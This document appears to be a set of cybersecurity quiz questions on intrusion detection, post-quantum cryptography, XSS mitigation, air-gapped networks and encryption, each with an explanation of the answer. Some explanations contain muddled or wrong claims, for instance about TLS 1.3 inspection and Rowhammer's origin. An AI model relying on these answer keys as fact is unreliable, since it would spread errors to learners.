Cyber Security MCQs - Technology

Consider the following statements regarding Network Intrusion Detection Systems: 1. Network-based Intrusion Detection Systems (NIDS) are typically deployed at strategic points within a network, such as near firewalls or routers, to inspect traffic flowing across the entire subnet. 2. Stateful Protocol Analysis, a technique used in advanced IDS, tracks the state of network connections and verifies that the sequence of packets adheres to the expected protocol standards defined in RFC documents. 3. The concept of 'false positives' in IDS refers to instances where legitimate network traffic is incorrectly flagged as malicious, which can lead to administrative fatigue and reduced system responsiveness. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct because NIDS are strategically placed at network chokepoints to monitor traffic across an entire subnet for unauthorized access. Statement 2 is correct as stateful protocol analysis maintains a state table to ensure packets follow established RFC protocol standards, preventing anomalies like out-of-sequence attacks. Statement 3 is correct because false positives occur when benign traffic triggers an alert, causing 'alert fatigue' that can lead administrators to ignore genuine security threats.

Consider the following statements regarding Post-Quantum Cryptography: 1. The NIST Post-Quantum Cryptography competition concluded in 2020 with the selection of the McEliece cryptosystem as the primary standard for digital signatures. 2. Grover's algorithm provides a quadratic speedup for searching unstructured databases, which necessitates doubling the key sizes for symmetric encryption algorithms like AES-256 to maintain security. 3. The CRYSTALS-Dilithium algorithm is based on the Shortest Vector Problem in lattices and was formally adopted by the European Union Agency for Cybersecurity (ENISA) in 2019. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 1 is incorrect. Statement 3 is incorrect. Statement 2 is correct because Grover's algorithm reduces the effective security of symmetric keys by half, requiring AES-256 to provide 128-bit security against quantum attacks. Statement 1 is incorrect because NIST announced its first PQC standard selections in 2022, selecting CRYSTALS-Kyber for encryption, not McEliece for signatures. Statement 3 is incorrect because while CRYSTALS-Dilithium is based on lattice problems, it was selected by NIST in 2022 as a primary standard, not by ENISA in 2019.

Consider the following statements regarding Adversarial Machine Learning in Cybersecurity: 1. The 2017 DeepFool algorithm, designed to compute minimal perturbations, utilizes the curvature of the decision boundary to improve model accuracy during the adversarial training phase. 2. Membership Inference Attacks, formalized in a 2016 study, allow an adversary to reconstruct the original training dataset by exploiting the high confidence scores of models trained on small, non-regularized datasets. 3. The Jacobian-based Saliency Map Attack (JSMA), developed in 2015, relies on the L-infinity norm to constrain perturbations and functions as a black-box method for targeting neural network architectures. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because DeepFool is an untargeted attack method designed to find minimal perturbations to fool a classifier, not a technique for improving model accuracy during training. Statement 2 is incorrect because Membership Inference Attacks determine whether a specific data point was part of a model's training set, but they do not reconstruct the original training dataset itself. Statement 3 is incorrect because JSMA is a white-box attack that utilizes the Jacobian matrix of the model's output to identify features for perturbation, and it typically relies on the L0-norm to minimize the number of modified pixels rather than the L-infinity norm.

Consider the following statements regarding Post-Quantum Cryptography: 1. CRYSTALS-Kyber, selected by NIST in 2022 for general encryption, relies on the hardness of the Module Learning with Errors (MLWE) problem. 2. The Shor's algorithm was first demonstrated on a 5-qubit quantum processor in 2001, and it provides an exponential speedup for searching unstructured databases. 3. The National Institute of Standards and Technology (NIST) initiated the Post-Quantum Cryptography Standardization project in 2016 to identify algorithms capable of resisting quantum computer attacks. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect. Statement 1 is correct as NIST selected CRYSTALS-Kyber in 2022 for its efficiency and security based on the MLWE problem. Statement 3 is correct because NIST launched its standardization project in 2016 to develop quantum-resistant cryptographic primitives. Statement 2 is incorrect because while Shor's algorithm was indeed demonstrated in 2001, it is designed for integer factorization to break RSA encryption, whereas Grover's algorithm-not Shor's-is the one that provides a quadratic speedup for searching unstructured databases.

Consider the following statements regarding Zero Trust Architecture: 1. The United States Office of Management and Budget (OMB) Memorandum M-22-09, issued in January 2022, directs federal agencies to achieve specific Zero Trust maturity goals by the end of the 2024 fiscal year. 2. The concept of 'Policy Decision Point' (PDP) evaluates access requests, and the architecture involves the integration of hardware-based cryptographic keys at the application layer. 3. The NIST Special Publication 800-207, published in August 2020, formally defines Zero Trust Architecture as a collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect. Statement 1 is correct as OMB Memorandum M-22-09 mandates U.S. federal agencies to meet specific cybersecurity standards by the end of fiscal year 2024. Statement 3 is correct because NIST SP 800-207 provides the foundational framework for Zero Trust, emphasizing the 'never trust, always verify' principle based on least privilege. Statement 2 is incorrect because while the Policy Decision Point (PDP) does evaluate access, Zero Trust architecture is fundamentally a conceptual model for security policy and access control, not a requirement for hardware-based cryptographic keys at the application layer.

Consider the following statements regarding Side-Channel Attacks: 1. The Rowhammer effect involves repeatedly accessing adjacent memory rows to induce bit flips in DRAM, and it was first documented by researchers at Carnegie Mellon University in 2014 as a method for bypassing Spectre protections. 2. The Spectre vulnerability, disclosed in 2018, exploits branch prediction and speculative execution in modern microprocessors to leak data from the memory of other applications. 3. Differential Power Analysis (DPA) involves the statistical analysis of power consumption measurements from a hardware device to extract cryptographic keys, a technique first formalized by Paul Kocher in 1999. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect. Statement 1 is incorrect because while Rowhammer involves inducing bit flips in DRAM, it was first documented by Google Project Zero researchers in 2014, not Carnegie Mellon, and it predates the discovery of Spectre (2018). Statement 2 is correct as Spectre exploits speculative execution and branch prediction to bypass isolation boundaries, allowing unauthorized access to sensitive data. Statement 3 is correct because Differential Power Analysis (DPA) was indeed formalized by Paul Kocher in 1999, utilizing statistical methods to correlate power fluctuations with secret cryptographic keys.

Consider the following statements regarding Zero-day vulnerability exploitation: 1. The 2001 Budapest Convention on Cybercrime established a global legal framework that provides for the immediate mandatory disclosure of all zero-day vulnerabilities by private security researchers to their respective national governments. 2. The 2017 WannaCry ransomware attack relied on the EternalBlue exploit, which was a publicly documented vulnerability in the SMBv1 protocol that had been patched by Microsoft in early 2016. 3. The CVSS (Common Vulnerability Scoring System) version 3.1 framework provides a methodology for calculating the economic impact of a zero-day exploit based on the stock market valuation of the affected software vendor. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because the Budapest Convention focuses on harmonizing national laws and international cooperation, not mandating the disclosure of zero-day vulnerabilities. Statement 2 is incorrect because EternalBlue was an exploit for a vulnerability (MS17-010) that was not publicly known or patched until March 2017, shortly before the WannaCry attack, rather than being a known vulnerability from 2016. Statement 3 is incorrect because the CVSS framework assesses the technical severity and characteristics of vulnerabilities, such as exploitability and impact on confidentiality, integrity, and availability, rather than calculating economic impact based on stock market valuations.

Consider the following statements regarding Software Bill of Materials: 1. The NTIA published the 'Minimum Elements for a Software Bill of Materials' in July 2021, outlining core data fields such as supplier name, component name, and version string. 2. Executive Order 14028, signed in May 2021, establishes the VEX (Vulnerability Exploitability eXchange) as a mandatory protocol for federal agencies to verify the integrity of open-source libraries. 3. The SPDX specification, ratified as ISO/IEC 5962:2021, functions as a primary mechanism for managing digital rights and automates the patching of vulnerabilities within proprietary cloud environments. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is correct because the NTIA indeed published the 'Minimum Elements for an SBOM' in July 2021 to standardize supply chain transparency. Statement 2 is incorrect because while Executive Order 14028 mandated SBOMs, it did not establish VEX as a mandatory protocol for verifying open-source integrity; VEX is a communication format for vulnerability status, not a verification protocol. Statement 3 is incorrect because the SPDX specification (ISO/IEC 5962:2021) is a standard for documenting software components and licenses, not a mechanism for managing digital rights or automating vulnerability patching.

Consider the following statements regarding Advanced Persistent Threats Detection: 1. The MITRE ATT&CK framework, established in 2013, categorizes Advanced Persistent Threat (APT) tactics into 14 distinct stages, ranging from initial reconnaissance to impact. 2. The Cyber Kill Chain model, developed by Lockheed Martin in 2011, includes seven phases of an attack and serves as the primary standard for real-time automated packet filtering in cloud-native environments. 3. Heuristic analysis in APT detection involves identifying suspicious patterns by monitoring system calls, such as the unauthorized use of PowerShell scripts to execute fileless malware. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect. Statement 1 is correct as the MITRE ATT&CK framework, launched in 2013, organizes adversary behavior into 14 tactical categories. Statement 3 is correct because heuristic analysis detects threats by identifying anomalous behaviors, such as the execution of fileless malware via PowerShell, rather than relying solely on known signatures. Statement 2 is incorrect because, while the Cyber Kill Chain (2011) identifies seven attack phases, it is a strategic framework for incident response and defense planning, not a technical standard for real-time automated packet filtering.

Consider the following statements regarding Cross-Site Scripting Mitigation: 1. The DOMPurify library, released in 2014, utilizes a whitelist-based approach to sanitize HTML input and mitigate stored Cross-Site Scripting risks in single-page applications. 2. The HTML5 'sandbox' attribute for iframes, introduced in the 2014 specification, disables the execution of inline scripts and prevents the execution of external scripts from the same origin. 3. The SameSite cookie attribute, proposed in a 2016 IETF draft, provides a mechanism to restrict cookie transmission during cross-site requests, thereby reducing the impact of reflected Cross-Site Scripting. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 3 is correct. Statement 2 is incorrect. Statement 1 is correct as DOMPurify, launched in 2014, is a widely used DOM-only, super-fast, and uber-tolerant XSS sanitizer that employs a strict whitelist-based approach. Statement 3 is correct because the SameSite attribute, introduced in 2016, prevents browsers from sending cookies with cross-site requests, effectively mitigating CSRF and certain XSS-related session hijacking risks. Statement 2 is incorrect because while the 'sandbox' attribute restricts features like form submission and pop-ups, it does not inherently prevent the execution of scripts from the same origin; rather, it specifically restricts scripts unless the 'allow-scripts' keyword is explicitly added.

Consider the following statements regarding End-to-end encryption protocols: 1. The Matrix protocol, an open standard for decentralized communication, supports end-to-end encryption via the Olm and Megolm cryptographic ratchets. 2. RFC 8446 defines the TLS 1.3 protocol, which removed support for legacy cryptographic algorithms like SHA-1 and RC4 to enhance security in end-to-end communications. 3. Curve25519 is an elliptic curve used in the Ed25519 digital signature algorithm, providing 128 bits of security and high performance in end-to-end encrypted systems. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. All three statements are correct: Matrix utilizes the Olm and Megolm double-ratchet algorithms to ensure forward secrecy and post-compromise security in decentralized messaging. TLS 1.3 (RFC 8446), published in 2018, explicitly deprecated insecure legacy primitives like SHA-1, RC4, and DES to minimize attack surfaces. Curve25519 is a state-of-the-art elliptic curve designed for high-speed Diffie-Hellman key exchange and digital signatures (Ed25519), offering a robust 128-bit security level widely adopted in modern secure communication protocols.

Consider the following statements regarding Data Loss Prevention mechanisms: 1. The ISO/IEC 27001:2013 standard incorporates the General Data Protection Regulation (GDPR) Article 32 requirements as a mandatory baseline for all organizations seeking certification in cloud-based data loss prevention. 2. Data-in-motion protection mechanisms often utilize the TLS 1.3 protocol, which was finalized by the IETF in 2018 and includes native support for deep packet inspection of encrypted traffic without the need for man-in-the-middle proxies. 3. The NIST Special Publication 800-122, published in 2010, defines personally identifiable information (PII) and provides a framework for protecting such data through de-identification techniques within enterprise DLP systems. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is correct as NIST SP 800-122 provides the foundational framework for defining and protecting PII using de-identification techniques. Statement 1 is incorrect because ISO/IEC 27001 is a general information security management standard and does not mandate GDPR compliance as a baseline for cloud DLP certification. Statement 2 is incorrect because TLS 1.3 is designed to enhance privacy by preventing deep packet inspection; it explicitly requires man-in-the-middle proxies or endpoint decryption to inspect encrypted traffic, as it prohibits the legacy methods that allowed passive interception.

Consider the following statements regarding Hardware Security Modules: 1. Hardware Security Modules (HSMs) are physical computing devices that safeguard and manage digital keys, often complying with the FIPS 140-2 Level 3 standard for tamper-resistance. 2. The PKCS #11 standard, originally developed by RSA Laboratories in 1994, serves as a widely adopted application programming interface for interacting with cryptographic tokens like HSMs. 3. The Common Criteria for Information Technology Security Evaluation, established in 1999, provides the primary framework for certifying the physical hardware architecture of HSMs against electromagnetic side-channel attacks. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is incorrect. Statement 1 is correct as HSMs are dedicated physical devices designed to manage cryptographic keys, typically meeting FIPS 140-2 Level 3 for high-level tamper-resistance. Statement 2 is correct because PKCS #11 (Cryptoki) is the industry-standard API that enables applications to interface with cryptographic tokens like HSMs. Statement 3 is incorrect because while Common Criteria (ISO/IEC 15408) is a framework for evaluating IT security, it is a general-purpose standard for software and hardware, not a specific standard dedicated to certifying physical hardware against electromagnetic side-channel attacks.

Consider the following statements regarding Cloud-native security posture management: 1. The concept of 'Shift Left' security, popularized in the 2010 DevOps movement, refers to the practice of moving security testing to the production environment to ensure that cloud-native applications maintain compliance with the 1996 HIPAA technical safeguards. 2. The 2023 Gartner Market Guide for CSPM identifies the automation of remediation workflows as a critical capability for reducing the mean time to detect (MTTD) security drifts in multi-cloud infrastructures. 3. Infrastructure as Code (IaC) scanning tools, such as Checkov or Terrascan, analyze Terraform and CloudFormation templates for security vulnerabilities before the deployment phase begins. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect. Statement 1 is incorrect because 'Shift Left' security involves moving security testing to the early stages of the software development lifecycle (SDLC), rather than the production environment, to catch vulnerabilities before deployment. Statement 2 is correct as modern CSPM frameworks prioritize automated remediation to minimize the window of exposure for security drifts in complex multi-cloud environments. Statement 3 is correct because IaC scanning tools are specifically designed to perform static analysis on configuration files like Terraform and CloudFormation to identify security misconfigurations prior to infrastructure provisioning.

Consider the following statements regarding Biometric template protection: 1. The concept of 'Bio-hashing' typically utilizes a user-specific token or key combined with a biometric feature vector to produce a transformed template that can be revoked if compromised. 2. The Secure Multi-Party Computation (SMPC) approach to biometric authentication enables two or more parties to jointly compute the matching score without revealing their respective private biometric templates. 3. Salting in biometric template protection involves appending a random string to the biometric feature vector before hashing, which mitigates the risk of dictionary attacks on the stored template. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Bio-hashing is a cancellable biometric technique that binds a user-specific token to biometric data, allowing for template revocation if the system is breached. Secure Multi-Party Computation (SMPC) allows multiple entities to perform authentication by computing a function over private inputs without revealing the underlying biometric data, ensuring privacy-preserving verification. Salting involves adding random data (a salt) to the biometric feature vector before hashing, which effectively prevents pre-computed dictionary or rainbow table attacks by ensuring that identical biometric inputs result in unique stored hashes.

Consider the following statements regarding Data Loss Prevention mechanisms: 1. Digital Rights Management (DRM) systems often use the Advanced Encryption Standard (AES) with a 256-bit key length, and these systems are legally recognized as equivalent to data loss prevention controls under the 1996 WIPO Copyright Treaty. 2. The Data Loss Prevention (DLP) architecture known as 'Cloud Access Security Broker' (CASB) provides visibility into SaaS applications, and the 2014 Cloud Security Alliance guidelines classify CASB deployment as a replacement for traditional firewall-based egress filtering. 3. Data-at-rest discovery tools scan storage volumes for specific patterns using regular expressions, and the HIPAA Security Rule of 2003 specifies that such discovery tools are the primary method for ensuring compliance with technical safeguard standards. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because while DRM uses AES-256, the 1996 WIPO Copyright Treaty focuses on legal protection for technological measures, not the standardization of DLP controls. Statement 2 is incorrect because CASB acts as a complementary security layer for cloud services, not a replacement for traditional network-based egress filtering. Statement 3 is incorrect because, while discovery tools are used for compliance, the HIPAA Security Rule of 2003 mandates the implementation of technical safeguards rather than prescribing specific discovery tools as the primary method.

Consider the following statements regarding Air-gapped Network Security: 1. The NIST Special Publication 800-53 revision 5 framework includes specific controls for physical isolation, defining air-gapped systems as those lacking any physical or logical connection to external networks. 2. USB-based malware propagation remains a primary threat to air-gapped environments, and the 2014 BadUSB vulnerability provided a mechanism for firmware-level infection that was addressed by the IEEE 802.11ac protocol update. 3. Optical exfiltration techniques, such as the 2017 BitWhisper method, allow for data transfer between air-gapped machines using thermal sensors, a process that is recognized under the GDPR Article 32 security requirements. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is correct as NIST SP 800-53 Rev. 5 emphasizes physical isolation as a foundational security control for protecting high-value assets from external network threats. Statement 2 is incorrect because the BadUSB vulnerability involves malicious firmware modification that cannot be mitigated by the IEEE 802.11ac protocol, which governs wireless networking standards rather than USB hardware security. Statement 3 is incorrect because, while BitWhisper is a legitimate thermal-based exfiltration technique, GDPR Article 32 mandates general security measures for personal data protection and does not explicitly recognize or codify specific cyber-attack methodologies like thermal exfiltration.

Consider the following statements regarding Post-Quantum Cryptography: 1. NIST finalized the FIPS 203 standard in August 2024, which specifies the ML-KEM algorithm for key encapsulation mechanisms. 2. Shor's algorithm, formulated in 1994, demonstrates that a sufficiently powerful fault-tolerant quantum computer could factor large integers, thereby compromising RSA encryption. 3. The transition to post-quantum standards is often referred to as 'Q-Day' or 'Y2Q', representing the theoretical point where current public-key infrastructure becomes vulnerable. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct as NIST officially released FIPS 203 in August 2024, standardizing the ML-KEM algorithm based on the CRYSTALS-Kyber lattice-based scheme. Statement 2 is correct because Shor's algorithm provides a polynomial-time solution for integer factorization and discrete logarithms, which would render widely used RSA and ECC encryption schemes insecure. Statement 3 is correct, as 'Q-Day' or 'Y2Q' are widely accepted industry terms for the critical moment when quantum computers achieve the computational capacity to break current public-key cryptographic standards.

Consider the following statements regarding Homomorphic Encryption: 1. The BFV scheme, introduced in 2012, is based on the Ring Learning With Errors problem and is designed to process Boolean circuits through the use of elliptic curve cryptography. 2. The Zama research initiative, established in 2020, focuses on hardware acceleration for homomorphic encryption and relies on the AES-256 block cipher for its core algebraic operations. 3. Homomorphic encryption provides for the preservation of data integrity during transit, and it is currently the primary standard for securing communication under the 2016 GDPR technical guidelines. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because the BFV scheme is based on lattice-based cryptography (Ring-LWE) for modular arithmetic on integers, not elliptic curve cryptography for Boolean circuits. Statement 2 is incorrect because Zama focuses on Fully Homomorphic Encryption (FHE) software libraries like Concrete, which rely on the Torus-LWE problem rather than the AES-256 block cipher for its core operations. Statement 3 is incorrect because homomorphic encryption is designed for secure computation on encrypted data at rest, not specifically for transit, and it is not a mandated primary standard under the 2016 GDPR guidelines.

Consider the following statements regarding Blockchain-based Identity Management: 1. The Sovrin Network, launched in 2016, operates as a public permissioned ledger specifically designed to support the governance of global digital identity ecosystems. 2. Hyperledger Indy, a project hosted by the Linux Foundation, provides modular tools and libraries to build and use independent digital identities on distributed ledgers. 3. Zero-Knowledge Proofs (ZKPs) in blockchain identity management allow a user to verify their age or citizenship status to a verifier without disclosing the underlying personal data. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. The Sovrin Network, launched in 2016, is a public permissioned ledger governed by the non-profit Sovrin Foundation to facilitate self-sovereign identity. Hyperledger Indy is an open-source project under the Linux Foundation that provides decentralized identity-specific tools, while Zero-Knowledge Proofs (ZKPs) enable cryptographic verification of attributes (like age or eligibility) without revealing the specific data points, thereby enhancing user privacy. All three statements are factually accurate, reflecting the core components of modern decentralized identity frameworks.

Consider the following statements regarding Data Loss Prevention mechanisms: 1. Endpoint DLP agents typically operate at the kernel level to monitor file system activity, and the Windows Filtering Platform (WFP) API allows these agents to intercept network packets before they reach the TCP/IP stack. 2. The Payment Card Industry Data Security Standard (PCI DSS) version 4.0, released in 2022, includes specific clauses that forbid the use of tokenization as a substitute for end-to-end encryption in merchant point-of-sale systems. 3. The Data Security Council of India (DSCI) released the 'Framework for Data Protection' in 2015, which classifies all financial transaction logs as sensitive personal data under the Information Technology Act of 2000. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because while DLP agents monitor file systems, WFP is primarily a network traffic filtering framework, not a kernel-level file system monitor. Statement 2 is false as PCI DSS 4.0 explicitly encourages tokenization as a primary method to reduce scope, rather than forbidding it as a substitute for encryption. Statement 3 is incorrect because the DSCI framework is a voluntary industry guideline, not a legal classification under the IT Act, 2000, which defines sensitive personal data through the 2011 Rules rather than DSCI documents.

Consider the following statements regarding Steganography detection techniques: 1. The StegExpose tool, released in 2016, utilizes a multi-bit LSB detection algorithm capable of analyzing multiple image formats simultaneously to identify potential hidden payloads. 2. Blind steganalysis refers to the application of machine learning classifiers trained on specific embedding algorithms, such as F5 or OutGuess, to detect hidden information in high-resolution digital files. 3. The DCT (Discrete Cosine Transform) coefficient analysis is a primary method for detecting steganography in BMP files, as it identifies anomalies in the frequency domain created by spatial embedding. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is correct as StegExpose is an open-source tool released in 2016 specifically designed for bulk detection of LSB-based steganography across various image formats. Statement 2 is incorrect because 'Blind' (or Universal) steganalysis refers to techniques that do not require prior knowledge of the embedding algorithm, whereas the description provided refers to 'Targeted' steganalysis. Statement 3 is incorrect because DCT coefficient analysis is primarily used for JPEG files (which use frequency domain compression), whereas BMP files are uncompressed and are typically analyzed using spatial domain statistical methods.

Consider the following statements regarding Quantum Key Distribution: 1. The National Quantum Mission, approved by the Union Cabinet in April 2023, allocates a budget of ₹6,003 crore for the development of quantum computers, with a specific provision for the deployment of a 2,000-kilometer terrestrial QKD network across the Himalayan border. 2. The 2016 launch of the Micius satellite by the Chinese Academy of Sciences facilitated the first intercontinental quantum-secured video call between Beijing and Vienna, utilizing the E91 protocol for entanglement-based key distribution. 3. The Tokyo QKD Network, operational since 2010, serves as the world's first multi-node quantum network, integrating the SARG04 protocol to enable secure data transmission between the National Institute of Information and Communications Technology and various commercial banking partners. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because while the National Quantum Mission has a budget of ₹6,003 crore, it targets a 2,000-kilometer QKD network across India, not specifically the Himalayan border. Statement 2 is incorrect because the Micius satellite utilized the BB84 protocol for its landmark 2017 intercontinental video call, not the E91 protocol. Statement 3 is incorrect because the Tokyo QKD Network, while a pioneer, primarily utilized the BB84 protocol rather than SARG04 for its operational key distribution.

Consider the following statements regarding Biometric template protection: 1. Homomorphic encryption allows for the comparison of biometric templates in the encrypted domain, ensuring that the raw biometric data remains hidden from the matching server. 2. The ISO/IEC 24745 standard, published in 2011, provides a framework for the protection of biometric information and outlines requirements for secure biometric template storage. 3. Fuzzy extractors, introduced by Dodis et al. in 2004, allow for the generation of a stable cryptographic key from noisy biometric inputs by using error-correcting codes. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. Statement 1 is correct because homomorphic encryption enables mathematical operations on ciphertext, allowing biometric matching without decryption. Statement 2 is correct as ISO/IEC 24745:2011 is the internationally recognized standard specifically designed to protect the confidentiality and integrity of biometric templates during storage and transmission. Statement 3 is correct because fuzzy extractors address the inherent variability in biometric data by using error-correcting codes to derive consistent cryptographic keys from noisy inputs, a concept formalized by Dodis et al. in 2004.

Consider the following statements regarding Zero Trust Architecture: 1. Continuous Diagnostics and Mitigation (CDM) programs provide for real-time asset monitoring, and these tools serve as the foundational authentication layer for Zero Trust network access (ZTNA). 2. The principle of 'Least Privilege' is derived from the Bell-LaPadula model, which focuses on data integrity in multi-level security systems for military networks. 3. Software-Defined Perimeter (SDP) architecture utilizes a 'black cloud' approach to hide network resources, and this method relies on the BGP routing protocol to verify user identities. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is incorrect. Statement 1 is incorrect because CDM programs focus on vulnerability management rather than serving as the foundational authentication layer for ZTNA, which relies on Identity and Access Management (IAM) systems. Statement 2 is incorrect because the 'Least Privilege' principle is a general security concept, whereas the Bell-LaPadula model specifically focuses on data confidentiality (preventing unauthorized read access) rather than integrity. Statement 3 is incorrect because while SDP uses a 'black cloud' to hide resources, it relies on mutual TLS (mTLS) and pre-authentication protocols to verify identities, not the BGP routing protocol, which is used for inter-domain routing.

Consider the following statements regarding Cross-Site Scripting Mitigation: 1. The Content-Type Options header, established in the 2009 Internet Explorer 8 release, serves to prevent MIME-type sniffing and serves as the primary defense against stored Cross-Site Scripting in legacy web frameworks. 2. The OWASP Top 10 project, which first identified Cross-Site Scripting as a critical vulnerability in 2003, recommends the use of context-aware output encoding to neutralize malicious payloads. 3. The 'HttpOnly' flag, introduced by Microsoft in Internet Explorer 6 SP1 in 2002, prevents client-side scripts from accessing sensitive session cookies via the document.cookie API. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect. Statement 1 is incorrect because the X-Content-Type-Options header prevents MIME-type sniffing to stop browsers from executing non-executable files as scripts, but it is not a defense against stored Cross-Site Scripting. Statement 2 is correct as the OWASP Top 10 has consistently categorized XSS as a critical risk since its 2003 inception, advocating context-aware output encoding to treat untrusted data as content rather than executable code. Statement 3 is correct because the 'HttpOnly' flag, introduced by Microsoft in 2002, restricts cookie access from the document.cookie API, effectively mitigating session hijacking via XSS.

Consider the following statements regarding Air-gapped Network Security: 1. Acoustic bridging, as demonstrated in the 2013 Fansmitter research, allows for data exfiltration from air-gapped computers by manipulating internal fan speeds to transmit binary data over ultrasonic frequencies. 2. The 2015 Operation Olympic Games report details how air-gapped networks in military command centers utilize specialized hardware security modules, which are regulated under the Wassenaar Arrangement for dual-use technologies. 3. The Stuxnet worm, identified in 2010, successfully compromised air-gapped industrial control systems at the Natanz nuclear facility by leveraging a vulnerability in Windows shortcut files. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 3 is correct. Statement 1 is incorrect. Statement 2 is incorrect. Statement 3 is correct because the 2010 Stuxnet worm successfully breached the Natanz facility's air-gapped systems by exploiting a zero-day vulnerability in Windows LNK shortcut files via infected USB drives. Statement 1 is incorrect because the 'Fansmitter' research was published in 2016, not 2013, by researchers at Ben-Gurion University. Statement 2 is incorrect because 'Operation Olympic Games' refers to the clandestine cyber-operation against Iran's nuclear program, not a report on hardware security modules regulated by the Wassenaar Arrangement.

Consider the following statements regarding Homomorphic Encryption: 1. The CKKS scheme, introduced in 2017, is optimized for approximate arithmetic on encrypted floating-point numbers, making it suitable for machine learning applications. 2. Craig Gentry proposed the first fully homomorphic encryption scheme in 2009, utilizing lattice-based cryptography to enable arbitrary computations on encrypted data. 3. Homomorphic encryption is categorized into three levels-Partial, Somewhat, and Fully-based on the number and type of operations permitted on the ciphertext. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 1 is correct. Statement 2 is correct. Statement 3 is correct. All three statements are correct: the CKKS scheme (2017) is a landmark in privacy-preserving machine learning due to its support for approximate arithmetic on floating-point numbers, while Craig Gentry's 2009 breakthrough utilized lattice-based cryptography to solve the long-standing problem of fully homomorphic encryption (FHE). Furthermore, homomorphic encryption is indeed classified into Partial (PHE), Somewhat (SWHE), and Fully (FHE) categories based on the depth and variety of algebraic operations (addition and multiplication) allowed on ciphertexts without decryption.

Consider the following statements regarding Quantum Key Distribution: 1. The QKD-based secure communication link established between the DRDO's Hyderabad facilities in 2020 utilized satellite-based laser relay technology to bypass atmospheric turbulence, achieving a key generation rate of 10 Mbps. 2. Quantum Key Distribution (QKD) relies on the principles of quantum mechanics, specifically the no-cloning theorem, to ensure that any attempt at eavesdropping on the key generation process introduces detectable disturbances. 3. In February 2022, the Indian Space Research Organisation (ISRO) successfully demonstrated free-space Quantum Key Distribution over a distance of 300 meters between two buildings at the Space Applications Centre in Ahmedabad. How many of the statements given above are correct?

Only one
Only two
All three
None

Explanation: Statement 2 is correct. Statement 3 is correct. Statement 1 is incorrect. Statement 2 is correct because QKD leverages the no-cloning theorem, which dictates that any measurement of a quantum state by an eavesdropper inevitably alters the state, thereby revealing the intrusion. Statement 3 is correct as ISRO successfully demonstrated free-space QKD over 300 meters at the Space Applications Centre in February 2022 using indigenously developed NAVIC receiver systems. Statement 1 is incorrect because the 2020 DRDO demonstration involved a fiber-optic link between two Hyderabad facilities over a distance of 12 km, not satellite-based laser relay, and the key generation rate was significantly lower than 10 Mbps.

Consider the following statements regarding End-to-end encryption protocols: 1. The Noise Protocol Framework is a collection of cryptographic patterns that allow developers to build secure channels by combining Diffie-Hellman key exchanges with symmetric encryption. 2. The PGP (Pretty Good Privacy) standard, developed by Phil Zimmermann in 1991, relies on a web of trust model to verify the authenticity of public keys. 3. The AES-256-GCM encryption standard is frequently employed within end-to-end encrypted messaging applications to provide both data confidentiality and authenticity. How many of the statements given above are correct?

Only one
Only two
All three
None

